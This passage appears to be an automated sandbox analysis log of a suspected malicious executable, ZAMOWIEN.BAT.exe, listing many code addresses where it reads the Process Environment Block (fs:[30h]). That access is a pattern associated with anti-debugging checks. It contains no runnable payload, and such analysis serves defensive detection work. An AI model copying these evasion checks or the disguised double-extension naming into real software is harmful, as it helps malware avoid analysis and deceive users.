          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377736E0 mov eax, dword ptr fs:[00000030h]2_2_377736E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377736E0 mov eax, dword ptr fs:[00000030h]2_2_377736E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377736E0 mov eax, dword ptr fs:[00000030h]2_2_377736E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377736E0 mov eax, dword ptr fs:[00000030h]2_2_377736E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FD6D0 mov eax, dword ptr fs:[00000030h]2_2_376FD6D0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3774D69D mov eax, dword ptr fs:[00000030h]2_2_3774D69D
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778F68C mov eax, dword ptr fs:[00000030h]2_2_3778F68C
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37759567 mov eax, dword ptr fs:[00000030h]2_2_37759567
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778B56E mov eax, dword ptr fs:[00000030h]2_2_3778B56E
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778B56E mov ecx, dword ptr fs:[00000030h]2_2_3778B56E
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778B56E mov eax, dword ptr fs:[00000030h]2_2_3778B56E
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377AB55F mov eax, dword ptr fs:[00000030h]2_2_377AB55F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377AB55F mov eax, dword ptr fs:[00000030h]2_2_377AB55F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C753F mov eax, dword ptr fs:[00000030h]2_2_376C753F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C753F mov eax, dword ptr fs:[00000030h]2_2_376C753F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C753F mov eax, dword ptr fs:[00000030h]2_2_376C753F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3770F523 mov eax, dword ptr fs:[00000030h]2_2_3770F523
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37701527 mov eax, dword ptr fs:[00000030h]2_2_37701527
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D3536 mov eax, dword ptr fs:[00000030h]2_2_376D3536
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D3536 mov eax, dword ptr fs:[00000030h]2_2_376D3536
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F51B mov eax, dword ptr fs:[00000030h]2_2_3777F51B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F51B mov eax, dword ptr fs:[00000030h]2_2_3777F51B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F51B mov eax, dword ptr fs:[00000030h]2_2_3777F51B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F51B mov eax, dword ptr fs:[00000030h]2_2_3777F51B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F51B mov eax, dword ptr fs:[00000030h]2_2_3777F51B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F51B mov eax, dword ptr fs:[00000030h]2_2_3777F51B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F51B mov ecx, dword ptr fs:[00000030h]2_2_3777F51B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F51B mov ecx, dword ptr fs:[00000030h]2_2_3777F51B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F51B mov eax, dword ptr fs:[00000030h]2_2_3777F51B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F51B mov eax, dword ptr fs:[00000030h]2_2_3777F51B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F51B mov eax, dword ptr fs:[00000030h]2_2_3777F51B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F51B mov eax, dword ptr fs:[00000030h]2_2_3777F51B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F51B mov eax, dword ptr fs:[00000030h]2_2_3777F51B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CB502 mov eax, dword ptr fs:[00000030h]2_2_376CB502
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778550D mov eax, dword ptr fs:[00000030h]2_2_3778550D
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778550D mov eax, dword ptr fs:[00000030h]2_2_3778550D
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778550D mov eax, dword ptr fs:[00000030h]2_2_3778550D
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F1514 mov eax, dword ptr fs:[00000030h]2_2_376F1514
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F1514 mov eax, dword ptr fs:[00000030h]2_2_376F1514
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F1514 mov eax, dword ptr fs:[00000030h]2_2_376F1514
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F1514 mov eax, dword ptr fs:[00000030h]2_2_376F1514
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F1514 mov eax, dword ptr fs:[00000030h]2_2_376F1514
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F1514 mov eax, dword ptr fs:[00000030h]2_2_376F1514
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DB5E0 mov eax, dword ptr fs:[00000030h]2_2_376DB5E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DB5E0 mov eax, dword ptr fs:[00000030h]2_2_376DB5E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DB5E0 mov eax, dword ptr fs:[00000030h]2_2_376DB5E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DB5E0 mov eax, dword ptr fs:[00000030h]2_2_376DB5E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DB5E0 mov eax, dword ptr fs:[00000030h]2_2_376DB5E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DB5E0 mov eax, dword ptr fs:[00000030h]2_2_376DB5E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377555E0 mov eax, dword ptr fs:[00000030h]2_2_377555E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377015EF mov eax, dword ptr fs:[00000030h]2_2_377015EF
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775B5D3 mov eax, dword ptr fs:[00000030h]2_2_3775B5D3
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF5C7 mov eax, dword ptr fs:[00000030h]2_2_376CF5C7
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF5C7 mov eax, dword ptr fs:[00000030h]2_2_376CF5C7
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF5C7 mov eax, dword ptr fs:[00000030h]2_2_376CF5C7
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF5C7 mov eax, dword ptr fs:[00000030h]2_2_376CF5C7
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF5C7 mov eax, dword ptr fs:[00000030h]2_2_376CF5C7
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF5C7 mov eax, dword ptr fs:[00000030h]2_2_376CF5C7
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF5C7 mov eax, dword ptr fs:[00000030h]2_2_376CF5C7
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF5C7 mov eax, dword ptr fs:[00000030h]2_2_376CF5C7
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF5C7 mov eax, dword ptr fs:[00000030h]2_2_376CF5C7
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37777591 mov edi, dword ptr fs:[00000030h]2_2_37777591
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37709580 mov eax, dword ptr fs:[00000030h]2_2_37709580
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37709580 mov eax, dword ptr fs:[00000030h]2_2_37709580
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778F582 mov eax, dword ptr fs:[00000030h]2_2_3778F582
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777B58B mov eax, dword ptr fs:[00000030h]2_2_3777B58B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777B58B mov eax, dword ptr fs:[00000030h]2_2_3777B58B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777B58B mov eax, dword ptr fs:[00000030h]2_2_3777B58B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777B58B mov eax, dword ptr fs:[00000030h]2_2_3777B58B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778F478 mov eax, dword ptr fs:[00000030h]2_2_3778F478
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C7460 mov eax, dword ptr fs:[00000030h]2_2_376C7460
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C7460 mov eax, dword ptr fs:[00000030h]2_2_376C7460
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3770D450 mov eax, dword ptr fs:[00000030h]2_2_3770D450
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3770D450 mov eax, dword ptr fs:[00000030h]2_2_3770D450
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DD454 mov eax, dword ptr fs:[00000030h]2_2_376DD454
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DD454 mov eax, dword ptr fs:[00000030h]2_2_376DD454
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DD454 mov eax, dword ptr fs:[00000030h]2_2_376DD454
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DD454 mov eax, dword ptr fs:[00000030h]2_2_376DD454
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DD454 mov eax, dword ptr fs:[00000030h]2_2_376DD454
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DD454 mov eax, dword ptr fs:[00000030h]2_2_376DD454
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778D430 mov eax, dword ptr fs:[00000030h]2_2_3778D430
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778D430 mov eax, dword ptr fs:[00000030h]2_2_3778D430
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CB420 mov eax, dword ptr fs:[00000030h]2_2_376CB420
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37707425 mov eax, dword ptr fs:[00000030h]2_2_37707425
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37707425 mov ecx, dword ptr fs:[00000030h]2_2_37707425
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3776B420 mov eax, dword ptr fs:[00000030h]2_2_3776B420
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3776B420 mov eax, dword ptr fs:[00000030h]2_2_3776B420
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775F42F mov eax, dword ptr fs:[00000030h]2_2_3775F42F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775F42F mov eax, dword ptr fs:[00000030h]2_2_3775F42F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775F42F mov eax, dword ptr fs:[00000030h]2_2_3775F42F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775F42F mov eax, dword ptr fs:[00000030h]2_2_3775F42F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775F42F mov eax, dword ptr fs:[00000030h]2_2_3775F42F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37759429 mov eax, dword ptr fs:[00000030h]2_2_37759429
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778F409 mov eax, dword ptr fs:[00000030h]2_2_3778F409
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778F4FD mov eax, dword ptr fs:[00000030h]2_2_3778F4FD
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377054E0 mov eax, dword ptr fs:[00000030h]2_2_377054E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F94FA mov eax, dword ptr fs:[00000030h]2_2_376F94FA
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F14C9 mov eax, dword ptr fs:[00000030h]2_2_376F14C9
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F14C9 mov eax, dword ptr fs:[00000030h]2_2_376F14C9
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F14C9 mov eax, dword ptr fs:[00000030h]2_2_376F14C9
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F14C9 mov eax, dword ptr fs:[00000030h]2_2_376F14C9
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F14C9 mov eax, dword ptr fs:[00000030h]2_2_376F14C9
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FF4D0 mov eax, dword ptr fs:[00000030h]2_2_376FF4D0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FF4D0 mov eax, dword ptr fs:[00000030h]2_2_376FF4D0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FF4D0 mov eax, dword ptr fs:[00000030h]2_2_376FF4D0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FF4D0 mov eax, dword ptr fs:[00000030h]2_2_376FF4D0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FF4D0 mov eax, dword ptr fs:[00000030h]2_2_376FF4D0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FF4D0 mov eax, dword ptr fs:[00000030h]2_2_376FF4D0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FF4D0 mov eax, dword ptr fs:[00000030h]2_2_376FF4D0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FF4D0 mov eax, dword ptr fs:[00000030h]2_2_376FF4D0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FF4D0 mov eax, dword ptr fs:[00000030h]2_2_376FF4D0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377854B0 mov eax, dword ptr fs:[00000030h]2_2_377854B0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377854B0 mov ecx, dword ptr fs:[00000030h]2_2_377854B0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775D4A0 mov ecx, dword ptr fs:[00000030h]2_2_3775D4A0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775D4A0 mov eax, dword ptr fs:[00000030h]2_2_3775D4A0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775D4A0 mov eax, dword ptr fs:[00000030h]2_2_3775D4A0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3770B490 mov eax, dword ptr fs:[00000030h]2_2_3770B490
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3770B490 mov eax, dword ptr fs:[00000030h]2_2_3770B490
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37775490 mov eax, dword ptr fs:[00000030h]2_2_37775490
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37775490 mov eax, dword ptr fs:[00000030h]2_2_37775490
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37775490 mov eax, dword ptr fs:[00000030h]2_2_37775490
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37775490 mov eax, dword ptr fs:[00000030h]2_2_37775490
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37775490 mov eax, dword ptr fs:[00000030h]2_2_37775490
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37775490 mov eax, dword ptr fs:[00000030h]2_2_37775490
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37775490 mov eax, dword ptr fs:[00000030h]2_2_37775490
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DB360 mov eax, dword ptr fs:[00000030h]2_2_376DB360
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DB360 mov eax, dword ptr fs:[00000030h]2_2_376DB360
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DB360 mov eax, dword ptr fs:[00000030h]2_2_376DB360
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DB360 mov eax, dword ptr fs:[00000030h]2_2_376DB360
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DB360 mov eax, dword ptr fs:[00000030h]2_2_376DB360
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DB360 mov eax, dword ptr fs:[00000030h]2_2_376DB360
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F332D mov eax, dword ptr fs:[00000030h]2_2_376F332D
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377A3336 mov eax, dword ptr fs:[00000030h]2_2_377A3336
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C9303 mov eax, dword ptr fs:[00000030h]2_2_376C9303
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C9303 mov eax, dword ptr fs:[00000030h]2_2_376C9303
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778F30A mov eax, dword ptr fs:[00000030h]2_2_3778F30A
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775330C mov eax, dword ptr fs:[00000030h]2_2_3775330C
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775330C mov eax, dword ptr fs:[00000030h]2_2_3775330C
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775330C mov eax, dword ptr fs:[00000030h]2_2_3775330C
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775330C mov eax, dword ptr fs:[00000030h]2_2_3775330C
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377033D0 mov eax, dword ptr fs:[00000030h]2_2_377033D0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D93A6 mov eax, dword ptr fs:[00000030h]2_2_376D93A6
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D93A6 mov eax, dword ptr fs:[00000030h]2_2_376D93A6
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37771390 mov eax, dword ptr fs:[00000030h]2_2_37771390
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37771390 mov eax, dword ptr fs:[00000030h]2_2_37771390
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D1380 mov eax, dword ptr fs:[00000030h]2_2_376D1380
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D1380 mov eax, dword ptr fs:[00000030h]2_2_376D1380
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D1380 mov eax, dword ptr fs:[00000030h]2_2_376D1380
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D1380 mov eax, dword ptr fs:[00000030h]2_2_376D1380
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D1380 mov eax, dword ptr fs:[00000030h]2_2_376D1380
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376EF380 mov eax, dword ptr fs:[00000030h]2_2_376EF380
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376EF380 mov eax, dword ptr fs:[00000030h]2_2_376EF380
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376EF380 mov eax, dword ptr fs:[00000030h]2_2_376EF380
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376EF380 mov eax, dword ptr fs:[00000030h]2_2_376EF380
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376EF380 mov eax, dword ptr fs:[00000030h]2_2_376EF380
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376EF380 mov eax, dword ptr fs:[00000030h]2_2_376EF380
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778F38A mov eax, dword ptr fs:[00000030h]2_2_3778F38A
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778D270 mov eax, dword ptr fs:[00000030h]2_2_3778D270
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3776327E mov eax, dword ptr fs:[00000030h]2_2_3776327E
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3776327E mov eax, dword ptr fs:[00000030h]2_2_3776327E
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3776327E mov eax, dword ptr fs:[00000030h]2_2_3776327E
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3776327E mov eax, dword ptr fs:[00000030h]2_2_3776327E
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3776327E mov eax, dword ptr fs:[00000030h]2_2_3776327E
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3776327E mov eax, dword ptr fs:[00000030h]2_2_3776327E
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CB273 mov eax, dword ptr fs:[00000030h]2_2_376CB273
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CB273 mov eax, dword ptr fs:[00000030h]2_2_376CB273
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CB273 mov eax, dword ptr fs:[00000030h]2_2_376CB273
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3774D250 mov eax, dword ptr fs:[00000030h]2_2_3774D250
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3774D250 mov ecx, dword ptr fs:[00000030h]2_2_3774D250
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FF24A mov eax, dword ptr fs:[00000030h]2_2_376FF24A
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3779124C mov eax, dword ptr fs:[00000030h]2_2_3779124C
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3779124C mov eax, dword ptr fs:[00000030h]2_2_3779124C
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3779124C mov eax, dword ptr fs:[00000030h]2_2_3779124C
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3779124C mov eax, dword ptr fs:[00000030h]2_2_3779124C
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778F247 mov eax, dword ptr fs:[00000030h]2_2_3778F247
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775B214 mov eax, dword ptr fs:[00000030h]2_2_3775B214
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775B214 mov eax, dword ptr fs:[00000030h]2_2_3775B214
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CD2EC mov eax, dword ptr fs:[00000030h]2_2_376CD2EC
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CD2EC mov eax, dword ptr fs:[00000030h]2_2_376CD2EC
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C72E0 mov eax, dword ptr fs:[00000030h]2_2_376C72E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377732DF mov eax, dword ptr fs:[00000030h]2_2_377732DF
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377732DF mov eax, dword ptr fs:[00000030h]2_2_377732DF
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377732DF mov eax, dword ptr fs:[00000030h]2_2_377732DF
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377732DF mov eax, dword ptr fs:[00000030h]2_2_377732DF
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377732DF mov eax, dword ptr fs:[00000030h]2_2_377732DF
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F32C5 mov eax, dword ptr fs:[00000030h]2_2_376F32C5
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377A32C9 mov eax, dword ptr fs:[00000030h]2_2_377A32C9
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C92AF mov eax, dword ptr fs:[00000030h]2_2_376C92AF
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377AB2BC mov eax, dword ptr fs:[00000030h]2_2_377AB2BC
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377AB2BC mov eax, dword ptr fs:[00000030h]2_2_377AB2BC
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377AB2BC mov eax, dword ptr fs:[00000030h]2_2_377AB2BC
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377AB2BC mov eax, dword ptr fs:[00000030h]2_2_377AB2BC
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377992AB mov eax, dword ptr fs:[00000030h]2_2_377992AB
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778F2AE mov eax, dword ptr fs:[00000030h]2_2_3778F2AE
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D7290 mov eax, dword ptr fs:[00000030h]2_2_376D7290
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D7290 mov eax, dword ptr fs:[00000030h]2_2_376D7290
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D7290 mov eax, dword ptr fs:[00000030h]2_2_376D7290
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3772717A mov eax, dword ptr fs:[00000030h]2_2_3772717A
